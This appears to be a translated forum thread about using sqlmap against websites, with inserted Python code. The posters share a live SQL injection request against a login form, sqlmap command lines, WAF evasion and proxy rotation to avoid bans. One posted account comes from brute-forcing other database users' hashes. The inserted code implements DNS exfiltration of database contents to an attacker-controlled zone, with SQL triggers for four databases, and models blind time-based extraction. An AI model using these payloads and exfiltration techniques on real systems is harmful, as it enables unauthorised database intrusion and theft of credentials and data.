Buy two VPSes or dedicated servers and install BIND9 on them to bring up a master and a slave DNS server. Then register any domain pointing at your DNS servers; once the domain has been delegated, run sqlmap with the --dns-domain switch (sqlmap has to run not on your own PC but on the VPS where your master DNS is). But note that DNS exfiltration will only work when the site's server is on Windows; if it is on Linux, nothing will come of it.
Can someone advise? Through sqlmap I got an SQL injection under a restricted account, with only SELECT available. I brute-forced the hashes of other database users that have more privileges. How do I connect as another account through the SQL injection in sqlmap?
For a DNS tunnel to be set up successfully in Microsoft SQL Server, PostgreSQL and MySQL, these DBMSes have to support UNC-format paths, which by and large means that such a tunnel can be created if the server uses Microsoft Windows as the back-end OS.
That's just not true, though: there are any number of ways to make a domain resolve, for example in Oracle UTL_INADDR.GET_HOST_ADDRESS, UTL_HTTP.REQUEST, HTTPURITYPE.GETCLOB; in PostgreSQL, if I'm not mistaken, you can set up a connection to a remote database "on the fly" within the current connection. Why isn't that DNS exfiltration? Even if outbound traffic is blocked on most ports, the resolution will still go through in most cases.
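The channel the posts above are arguing about, as an added illustration (this is not code from the thread and not sqlmap's own implementation): the extracted value is hex-encoded, split into DNS labels under an attacker-controlled zone, and the DBMS is made to resolve those names; the authoritative server on the master VPS then only has to parse the incoming query names and reassemble the hex. The zone name exfil.example, the "sequence number label followed by hex data labels" layout and the per-DBMS trigger fragments are assumptions for illustration; sqlmap's real --dns-domain encoding is not reproduced. The UNC-based fragments (MSSQL, MySQL, PostgreSQL) are exactly the ones that only resolve on a Windows database host, while the Oracle UTL_INADDR call resolves on any OS, which is the point of the reply above.

```python
# Added example: a minimal model of a DNS exfiltration channel (not sqlmap's code).
import binascii
import struct

ZONE = "exfil.example"   # assumption: zone delegated to the attacker's master BIND9 VPS
MAX_LABEL = 63           # RFC 1035: one label is at most 63 octets
MAX_NAME = 253           # RFC 1035: a textual name is at most 253 characters


def build_names(data, zone=ZONE):
    """Hex-encode `data` and pack it into as few FQDNs as the limits allow.
    Each name is '<seq>.<hex label>...<zone>'; the 4-hex-digit seq label lets the
    receiver reorder queries that recursive resolvers deliver out of order."""
    hexdata = binascii.hexlify(data).decode("ascii")
    labels = [hexdata[i:i + MAX_LABEL] for i in range(0, len(hexdata), MAX_LABEL)]
    names, current, seq = [], [], 0
    for label in labels:
        candidate = ".".join(["%04x" % seq] + current + [label, zone])
        if current and len(candidate) > MAX_NAME:
            names.append(".".join(["%04x" % seq] + current + [zone]))
            seq += 1
            current = []
        current.append(label)
    if current:
        names.append(".".join(["%04x" % seq] + current + [zone]))
    return names


def payloads(name):
    """SQL fragments that make the DBMS resolve `name`. The UNC variants only
    resolve when the database host is Windows; the Oracle call resolves anywhere.
    `some_table` in the PostgreSQL COPY is a placeholder for any readable table."""
    unc = "\\\\%s\\x" % name
    return {
        "mssql": "EXEC master..xp_dirtree '%s'" % unc,
        "mysql": "SELECT LOAD_FILE('%s')" % unc.replace("\\", "\\\\"),
        "postgresql": "COPY some_table FROM '%s'" % unc,
        "oracle": "SELECT UTL_INADDR.GET_HOST_ADDRESS('%s') FROM DUAL" % name,
    }


def build_query(name, txid=0x1234):
    """Raw DNS A query for `name`, i.e. what the DB host's resolver sends upstream.
    Constructed here so the example runs offline."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    qname = b"".join(bytes([len(part)]) + part.encode("ascii") for part in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN


def parse_query(packet):
    """Extract the QNAME from a raw DNS query, as the listener on the master VPS
    sees it. Lower-cased: names are case-insensitive and resolvers may apply
    0x20 case randomisation, which would otherwise break the hex decoding."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    qdcount = struct.unpack(">H", packet[4:6])[0]
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels).lower()


def decode_names(names, zone=ZONE):
    """Reassemble the exfiltrated bytes from observed query names. Duplicates
    (resolver retries) collapse in the dict; a missing sequence number is
    reported instead of silently yielding garbage."""
    suffix = "." + zone
    chunks = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue   # unrelated traffic, e.g. a resolver probing the zone apex
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0], 16)] = "".join(labels[1:])
    missing = [i for i in range(len(chunks)) if i not in chunks]
    if missing or not chunks:
        raise ValueError("missing query sequence numbers: %s" % missing)
    return binascii.unhexlify("".join(chunks[i] for i in sorted(chunks)))


if __name__ == "__main__":
    sample = b"root@localhost:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"   # constructed
    names = build_names(sample)
    for n in names:
        print(n)
    print(payloads(names[0])["mssql"])
    print(decode_names([parse_query(build_query(n)) for n in names]))
```

One query carries about three 63-character labels under a short zone, so a long column value turns into many queries; the sequence label is what keeps them in order, and the gap check is what tells you a query was dropped rather than handing back a silently corrupted hash.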
Hello, please advise how to solve this. I have tried all sorts of things, including specifying --dbms=mysql | -b | -f, and the result is: [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. P.S. Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3
Spoiler: sqlmap
Code:
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.1.10#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:48:05

[10:48:05] [INFO] parsing HTTP request from 'vsd.txt'
[10:48:05] [WARNING] provided value for parameter 'user_search_products[status]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:48:05] [WARNING] provided value for parameter 'user_search_products[search_type]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:48:05] [INFO] testing connection to the target URL
[10:48:06] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:48:08] [WARNING] reflective value(s) found and filtering out
[10:48:08] [INFO] testing if the target URL is stable
[10:48:09] [INFO] target URL is stable
[10:48:09] [INFO] testing if POST parameter 'user_search_products[from]' is dynamic
[10:48:10] [INFO] confirming that POST parameter 'user_search_products[from]' is dynamic
[10:48:10] [INFO] POST parameter 'user_search_products[from]' is dynamic
[10:48:11] [WARNING] heuristic (basic) test shows that POST parameter 'user_search_products[from]' might not be injectable
[10:48:11] [INFO] testing for SQL injection on POST parameter 'user_search_products[from]'
[10:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:48:26] [INFO] POST parameter 'user_search_products[from]' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="\u0421\u0430\u043d\u043a\u0442-\u041f\u0435\u0442\u0435\u0440\u0431\u0443\u0440\u0433, \u0420\u043e\u0441\u0441\u0438\u044f - \u041c\u043e\u0441\u043a\u0432\u0430, \u0420\u043e\u0441\u0441\u0438\u044f")
[10:48:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:48:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:48:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:48:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:48:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:48:35] [INFO] testing 'MySQL inline queries'
[10:48:36] [INFO] testing 'PostgreSQL inline queries'
[10:48:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[10:48:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:48:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:48:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:48:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:48:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:48:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[10:48:40] [INFO] testing 'Oracle AND time-based blind'
[10:48:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:48:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:48:51] [INFO] checking if the injection point on POST parameter 'user_search_products[from]' is a false positive
POST parameter 'user_search_products[from]' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 65 HTTP(s) requests:
---
Parameter: user_search_products[from] (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_search_products[from]=%D0%A1%D0%B0%D0%BD%D0%BA%D1%82-%D0%9F%D0%B5%D1%82%D0%B5%D1%80%D0%B1%D1%83%D1%80%D0%B3, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F%' AND 5693=5693 AND '%'='&user_search_products[to]=%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B0, %D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F&user_search_products[startDate]=2017-01-18&user_search_products[endDate]=2017-01-31&user_search_products[train]=train&user_search_products[car]=car&user_search_products[status]=&user_search_products[search_type]=&user_search_products[search]=1&user_search_products[_token]=51dfe11994f10d02f4d92c43fed3b00ef606f937
---
[10:49:00] [INFO] testing MySQL
[10:49:00] [WARNING] the back-end DBMS is not MySQL
[10:49:00] [INFO] testing Oracle
[10:49:01] [WARNING] the back-end DBMS is not Oracle
[10:49:01] [INFO] testing PostgreSQL
[10:49:01] [WARNING] the back-end DBMS is not PostgreSQL
[10:49:01] [INFO] testing Microsoft SQL Server
[10:49:02] [WARNING] the back-end DBMS is not Microsoft SQL Server
[10:49:02] [INFO] testing SQLite
[10:49:02] [WARNING] the back-end DBMS is not SQLite
[10:49:02] [INFO] testing Microsoft Access
[10:49:03] [WARNING] the back-end DBMS is not Microsoft Access
[10:49:03] [INFO] testing Firebird
[10:49:03] [WARNING] the back-end DBMS is not Firebird
[10:49:03] [INFO] testing SAP MaxDB
[10:49:04] [WARNING] the back-end DBMS is not SAP MaxDB
[10:49:04] [INFO] testing Sybase
[10:49:05] [WARNING] the back-end DBMS is not Sybase
[10:49:05] [INFO] testing IBM DB2
[10:49:05] [WARNING] the back-end DBMS is not IBM DB2
[10:49:05] [INFO] testing HSQLDB
[10:49:06] [WARNING] the back-end DBMS is not HSQLDB or version is < 1.7.2
[10:49:06] [INFO] testing Informix
[10:49:07] [WARNING] the back-end DBMS is not Informix
[10:49:07] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
[10:49:07] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 61 times
Basically, the vulnerability is in the file /login.php. Attack details: URL-encoded POST input vb_login_username was set to -1' OR 3*2*1=6 AND 000491=000491 -- . How do I feed that into sqlmap and get the DB?
POST /ajax/login.php HTTP/1.1
Content-Length: 193
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http:site.com:80/
Cookie: mfsid=91olg79e3nj5nt6de6ugq5oks7; mfvb_lastvisit=1485043348; msort=views; morder=az; mfvb_sessionhash=a5613f6c416d595ef35b6db03ad466a7; loc=E_E4m6IbF_VLlaDm7ph_BwfJ46y_JHz15zI7eP9Q9gdwwJOr1usrLEth4LHDV1uyf0w6PWeToMTTYQJ0iyccmipr2OpL5jZf; sess=1; anj=dTM7k!M4/8DYRWSF']wIg2E?ajgksu!@wnf]meq8dWME4(EW<KPi?=O; icu=ChIIz5I0EAoYASABKAEwovWPxAUQovWPxAUYAA..; uuid2=232236036324528254; vi=2f37b8a7cdee445385794c4d22490464; fid=43c8d7dc1de0bdc89b1d9515f061c563; ADMARK=Sun, 22 Jan 2017 00:19:45 GMT; JEB2=5883F60075721AC455254076E0000000; __cfduid=d2fb312b6f2dec320460808e564733c5b1485044385; uid=7184278638849739066; AWSELB=83E705210A1682EC371C1D5E2E2558F3D1674E9DA1325CB04AC64150FC8B17E1E912D403C564B53C64E285925EDB501A0CACF3007DD99AD5CF2C680490773520F1E05601D7; KTPCACOOKIE=YES; PUBMDCID=3; pp=51048; pubfreq_87256=; pubtime_87256=TMC; PMDTSHR=cat:; ljt_reader=7bd9ee658b501e8dc00b7f88dbea3e76; ctag=102:1485130790|103:1485130790|168:1485130790|98:1485130790|7:1485130790|163:1485130790|162:1485130790|128:1485130790|161:1485130790|108:1485130790|160:1485130790|167:1485130790|72:1485130790|106:1486253990|166:1485130790|73:1485130790|165:1485130790|164:1485130790|153:1485130790|86:1485130790|155:1485130790|158:1485130790|159:1485130790|94:1485130790; u=aHR0cDovL21hbmdhZm94Lm1lL21hbmdh; pi=5978151310520199952; tp=3%3b1%2f22%2f2017+12%3a19%3a51+AM%3b1%2f29%2f2017+12%3a19%3a51+AM; UM1=sQAAAB-LCAAAAAAAAAvjsuIQEzLjksh0NQnI9jJIDHVLsnCyKHDz8_W38PcOCxPi5pjxb-GtR7MfmgiwSoE47xs6zoE4WgxczhwiQvZcKiaJpsmJ5omJuqYpBia6JgZAVmJaipGuUWKioXGqZYqlqVkK0JxLXVdg5nBwPPmxuZNbgBloiB5HopAWF497amhgSlqGW3KKuyVQcdvEHwhLERwtBgAeqoJGsQAAAA2; TDID=6f762b27-bb26-4c45-b0a7-42a6911a29f5; CS1=2; _t=5c1b5e1e-e039-11e6-a8c7-00259037ff12; _vt=0; 3pids=5031:5978151310520199952
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20
It looks like sqlmap is checking whether there is a WAF there.
Code:
./waf/webappsecure.py:15: return code == 403
Try adding --skip-waf
I think this should go through (the --data value has to be quoted, otherwise the shell treats the & characters as job separators):
./sqlmap -u site.com --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=-1'%20OR%203*2*1%3d6%20AND%20000491%3d000491%20--%20" -p vb_login_username --dbs
Code:
-u "http://www.site.com/login.php" --random-agent --threads=6 --data="cookieuser=1&do=login&s=&securitytoken=&vb_login_md5password=&vb_login_md5password_utf=&vb_login_password=g00dPa%24%24w0rD&vb_login_username=1*" --level=5 --current-db
Try saving the cookie to a file, say sql.txt, and then run:
./sqlmap -r "path to sql.txt" -p vb_login_username
So, I have an SQLi, time-based blind; it enumerates very slowly and throws errors, then with a 7-second timeout it picks up a character. But apart from --current-user it won't retrieve anything. Has anyone run into this, and how should I proceed?
Well, one SQLi is not like another. Get into the habit of reading the logs, option -v 3; sqlmap usually writes where it stumbles. Most likely there is a WAF.
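Why a time-based blind extraction at a 7-second delay is slow, and what failed requests do to it, as an added model (not code from the thread and not sqlmap's own logic). The target is a constructed stand-in whose response time is simulated instead of slept, `secret` is a made-up --current-user value, and the retry count and error rate are assumptions; the bisection itself is the standard technique: one true/false verdict per halving of the 0..127 character range, so seven requests per character, each "true" request costing a full SLEEP.

```python
# Added example: a model of time-based blind character extraction (not sqlmap's code).
import random


class FakeTarget:
    """Constructed stand-in for the injectable endpoint. `secret` is the value
    being extracted; the response time is simulated, not slept. `error_rate`
    models HTTP 500s and timeouts that carry no verdict at all."""

    def __init__(self, secret, delay=7.0, jitter=1.5, error_rate=0.0, seed=1):
        self.secret = secret
        self.delay = delay          # the SLEEP() length injected, 7 s as in the post above
        self.jitter = jitter        # normal server response time spread, assumed
        self.error_rate = error_rate
        self.rng = random.Random(seed)
        self.requests = 0

    def time_for(self, pos, threshold):
        """Simulated response time for the injected condition
        IF(ORD(SUBSTR(secret, pos+1, 1)) > threshold, SLEEP(delay), 0).
        None means the request failed (error page or timeout)."""
        self.requests += 1
        if self.rng.random() < self.error_rate:
            return None
        code = ord(self.secret[pos]) if pos < len(self.secret) else 0
        return self.rng.uniform(0, self.jitter) + (self.delay if code > threshold else 0)


def ask(target, pos, threshold, retries):
    """Turn a response time into a boolean, repeating requests that failed.
    None means every attempt failed; a tool that does not stop here ends up
    recording a wrong character, which is how garbled values come about."""
    for _ in range(retries):
        elapsed = target.time_for(pos, threshold)
        if elapsed is not None:
            return elapsed >= target.delay
    return None


def extract(target, max_len=64, retries=3):
    """Bisect each character code within 0..127: exactly 7 verdicts per
    character, plus 7 for the terminating NUL that marks the end of the value."""
    out = []
    for pos in range(max_len):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            verdict = ask(target, pos, mid, retries)
            if verdict is None:
                raise RuntimeError("no usable answer at position %d after %d tries" % (pos, retries))
            if verdict:
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:             # ORD() of a position past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    target = FakeTarget("root@localhost")            # constructed secret
    print(extract(target), target.requests, "requests")
    flaky = FakeTarget("root@localhost", error_rate=0.3, seed=7)
    print(extract(flaky, retries=20), flaky.requests, "requests with 30% failures")
```

With a clean target the 14-character value costs 105 requests, and every "true" verdict holds the connection for the full delay, so even a short value runs into minutes; once the target starts returning errors the retries multiply that, and when all retries for one position fail there is no honest answer for that character at all, which is the symptom in the post above.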
Can sqlmap be run through a list of proxies? That is, when the first proxy gets banned, it takes the next one from the list and carries on working?